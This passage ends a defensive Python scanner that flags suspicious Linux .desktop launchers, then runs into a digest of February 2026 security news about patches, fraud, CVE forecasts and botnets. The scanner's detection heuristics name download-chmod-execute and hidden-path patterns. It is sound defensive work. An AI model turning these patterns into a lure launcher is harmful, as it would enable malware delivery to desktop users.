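    # Unwrap `sh -c "..."` so the inner command is what gets inspected.
    cmd = exec_line
    if argv[0].rsplit("/", 1)[-1] in SHELLS and len(argv) >= 3 and argv[1] == "-c":
        finding.indicators.append("Exec= spawns a shell with -c")
        cmd = argv[2]

    tokens = [t for t in re.split(r"[\s;&|]+", cmd) if t]
    if any(t.rsplit("/", 1)[-1] in DOWNLOADERS for t in tokens):
        finding.indicators.append("Exec= downloads content (curl/wget)")
    if CHMOD_EXEC.search(cmd):
        finding.indicators.append("Exec= marks a file executable")
    if HIDDEN_OR_TMP.search(cmd):
        finding.indicators.append("Exec= references a temp or hidden path")

    # Document-themed name/icon with no document actually opened.
    name = entry.get("Name", "").lower()
    icon = entry.get("Icon", "").lower()
    themed = name.endswith(DOC_SUFFIXES) or "pdf" in icon
    if themed and not any(s in exec_line.lower() for s in DOC_SUFFIXES):
        finding.indicators.append("document-themed Name/Icon but Exec= opens no document")
    return finding


def scan(samples: dict[str, str]) -> list[Finding]:
    """Analyse a mapping of path -> file text and return only suspicious findings."""
    return [f for p, t in samples.items() if (f := analyse(p, t)).suspicious]


if __name__ == "__main__":
    for hit in scan({"report.desktop": BENIGN_DESKTOP, "lure.desktop": SUSPICIOUS_DESKTOP}):
        print(hit.path, "->", "; ".join(hit.indicators))
```

In practice the `samples` mapping would be built by walking `~/Desktop`, `~/.local/share/applications`, and `~/.config/autostart`, and the two-indicator threshold can be tuned per fleet; a legitimate launcher that merely calls `xdg-open` on a document trips none of the heuristics.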

Patch Tuesday: Over 60 Vendors Release Security Fixes for Critical Vulnerabilities

Updated: · First: 11.02.2026 15:28 · 📰 1 src / 1 articles

On the February 2026 Patch Tuesday, over 60 software vendors released security updates addressing critical vulnerabilities in their products. Microsoft patched 59 flaws, including six actively exploited zero-days in Windows components. Adobe, SAP, Intel, and Google also issued fixes for critical vulnerabilities in their respective products. The updates cover a wide range of software, including operating systems, cloud platforms, and network devices. The vulnerabilities addressed include security bypass, privilege escalation, denial-of-service (DoS), code injection, and missing authorization checks. Some of the flaws could lead to full database compromise and unauthorized remote function calls. The patches are crucial for maintaining the security of systems and preventing potential exploitation by threat actors.

Chinese National Sentenced for $73m Crypto Investment Fraud

Updated: · First: 11.02.2026 14:05 · 📰 1 src / 1 articles

A Chinese national, Daren Li, has been sentenced to 20 years in prison for his role in a global crypto-investment fraud scheme that defrauded victims of over $73 million. Li pleaded guilty to conspiring to launder funds obtained through cryptocurrency scams and related fraud. The scheme involved romance baiting and tech support scams, with victims contacted through social media, online dating sites, and cold calls. Li and his co-conspirators used spoofed websites and domains to appear legitimate and laundered proceeds through US shell companies.

CISA 2025 Year in Review: Strengthening Critical Infrastructure Security

Updated: · First: 11.02.2026 14:00 · 📰 1 src / 1 articles

CISA released its 2025 Year in Review, highlighting achievements in cyber and physical security. The report details CISA's efforts to modernize operations, accelerate threat responses, and collaborate with partners to safeguard critical infrastructure. Key accomplishments include publishing over 1,600 security products, triaging 30,000+ incidents, blocking billions of malicious connections, and conducting 148 security exercises with 10,000+ participants. Additionally, CISA introduced the Be Air Aware™ suite to manage unmanned aircraft system (UAS) threats.

FIRST Predicts Record 50,000+ CVEs in 2026

Updated: · First: 11.02.2026 13:35 · 📰 1 src / 1 articles

The Forum of Incident Response and Security Teams (FIRST) forecasts a record-breaking 59,427 new CVEs in 2026, with a 90% confidence interval ranging from 30,012 to 117,673. This prediction is based on a new statistical model using historical CVE data and publication trends. FIRST advises organizations to prepare for this surge by assessing their capacity, prioritizing vulnerabilities, and leveraging forecasting tools. The forecast suggests that CVE disclosures will continue to grow beyond 2026, with a median of 51,018 CVEs in 2027 and 53,289 in 2028.

Hackers Exploit Misconfigured Security Testing Apps to Breach Cloud Environments

Updated: 11.02.2026 13:30 · First: 21.01.2026 16:00 · 📰 3 src / 3 articles

Threat actors are exploiting misconfigured security testing applications, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to the cloud environments of Fortune 500 companies and security vendors. These applications are deliberately vulnerable by design, for training and testing, and pose a significant risk when exposed on the public internet and run under privileged cloud accounts. Pentera researchers discovered 1,926 live, vulnerable applications linked to overly privileged IAM roles, deployed on AWS, GCP, and Azure. Many instances used default credentials and exposed cloud credential sets, allowing attackers to deploy crypto miners and webshells and gain admin access to cloud environments. Active exploitation was confirmed, with evidence of crypto mining using XMRig, deployment of webshells, and advanced persistence mechanisms. Security vendors such as F5, Cloudflare, and Palo Alto Networks were among those affected. Pentera Labs verified nearly 2,000 live, exposed training application instances, with close to 60% hosted on customer-managed infrastructure running on AWS, Azure, or GCP. Approximately 20% of instances were found to contain artifacts deployed by malicious actors, including crypto-mining activity, webshells, and persistence mechanisms.

Microsoft February 2026 Patch Tuesday Addresses 6 Zero-Days and 59 Flaws

Updated: 11.02.2026 12:22 · First: 10.02.2026 20:51 · 📰 4 src / 4 articles

Microsoft's February 2026 Patch Tuesday addresses 59 vulnerabilities, including 6 actively exploited zero-days and 3 publicly disclosed flaws. The updates include fixes for 5 critical vulnerabilities, with three being security feature bypass flaws in various Microsoft products. The zero-days span components such as Windows Shell, MSHTML Framework, Microsoft Word, Desktop Window Manager, Windows Remote Access Connection Manager, and Windows Remote Desktop Services. Microsoft issued an out-of-band patch for one of the zero-days, CVE-2026-21514, highlighting its urgency. The updates also cover a range of other vulnerabilities, including elevation of privilege, security feature bypass, remote code execution, information disclosure, denial of service, and spoofing flaws. Additionally, Microsoft has begun rolling out updated Secure Boot certificates to replace expiring 2011 certificates. Other vendors, including Adobe, BeyondTrust, CISA, Cisco, Fortinet, Google, n8n, and SAP, have also released security updates or advisories.

SSHStalker Linux Botnet Uses IRC for C2 Communications

Updated: 11.02.2026 11:56 · First: 11.02.2026 01:09 · 📰 2 src / 3 articles

A new Linux botnet named SSHStalker has been documented, utilizing the outdated IRC protocol for command-and-control (C2) operations. The botnet employs classic IRC mechanics, including multiple C-based bots and multi-server/channel redundancy, prioritizing resilience and scale over stealth. It achieves initial access through automated SSH scanning and brute-forcing, using a Go binary disguised as nmap. Once infected, hosts are used to scan for additional SSH targets, and the botnet includes exploits for 16 CVEs targeting older Linux kernel versions. The botnet also performs AWS key harvesting, website scanning, and includes cryptomining kits and DDoS capabilities. Notably, SSHStalker maintains persistent access without immediate follow-on post-exploitation behavior, suggesting it may be used for staging, testing, or strategic access retention. The threat actor is suspected to be of Romanian origin, with operational overlaps with the hacking group Outlaw (aka Dota).

Microsoft September 2025 Patch Tuesday addresses 81 vulnerabilities, including two zero-days

Updated: 11.02.2026 11:50 · First: 09.09.2025 20:43 · 📰 13 src / 26 articles

Microsoft's November 2025 Patch Tuesday addressed 63 vulnerabilities, including one actively exploited zero-day vulnerability (CVE-2025-62215), a critical Remote Code Execution flaw (CVE-2025-60724), and several other notable vulnerabilities. The updates also included fixes for multiple elevation of privilege, remote code execution, information disclosure, denial-of-service, and spoofing vulnerabilities. Microsoft has released the first extended security update (ESU) for Windows 10, advising users to upgrade to Windows 11 or enroll in the ESU program. The KB5068781 update, the first Windows 10 extended security update since the operating system reached end of support on October 14, 2025, includes fixes for 63 flaws and one actively exploited elevation-of-privilege vulnerability. The September 2025 Patch Tuesday addressed 80 vulnerabilities, including 13 critical vulnerabilities. The updates fixed a range of issues, including privilege escalation, remote code execution, information disclosure, and denial-of-service vulnerabilities. The patches also covered a critical flaw in Azure Networking and addressed a new lateral movement technique dubbed BitLockMove. Additionally, security updates were released by multiple vendors, including Adobe, Cisco, Google, and others. The September 2025 update included 38 elevation of privilege (EoP) vulnerabilities. The two zero-day vulnerabilities were CVE-2025-55234 in Windows SMB Server and CVE-2024-21907 in Microsoft SQL Server. The SMB vulnerability was exploited through relay attacks, while the SQL Server flaw involved improper handling of exceptional conditions in Newtonsoft.Json. The updates also included hardening features for SMB Server to mitigate relay attacks, with recommendations for administrators to enable auditing to assess compatibility issues. 
The KB5065429 cumulative update for Windows 10 22H2 and 21H2 included fourteen fixes or changes, addressing unexpected UAC prompts and severe lag and stuttering issues with NDI streaming software. The update enabled auditing SMB client compatibility for SMB Server signing and SMB Server EPA, and included an opt-in feature for administrators to allow outbound network traffic from Windows 10 devices. In February 2026, Microsoft released updates to fix six actively exploited zero-day vulnerabilities, three of which have been publicly disclosed. These include CVE-2026-21510, CVE-2026-21513, CVE-2026-21514, CVE-2026-21519, CVE-2026-21525, and CVE-2026-21533. None of the actively exploited vulnerabilities are rated critical. In total, 25 CVEs disclosed by Microsoft were EoP, followed by remote code execution (12), spoofing (7), information disclosure (6), and security feature bypass (5). SAP also released 26 new security notes and one update to a previously released note, including critical vulnerabilities CVE-2026-0509 and CVE-2026-0488.

Windows 11 26H1 released for select ARM-based devices

Updated: · First: 11.02.2026 04:06 · 📰 1 src / 1 articles

Microsoft has released Windows 11 26H1, but it is exclusively for new devices with Snapdragon X2 processors and other upcoming ARM chips. This release is not a feature update for existing PCs but is designed to support new ARM-based hardware. Windows 11 26H2 is expected to follow the annual update cadence and will be available for all other PCs later this year.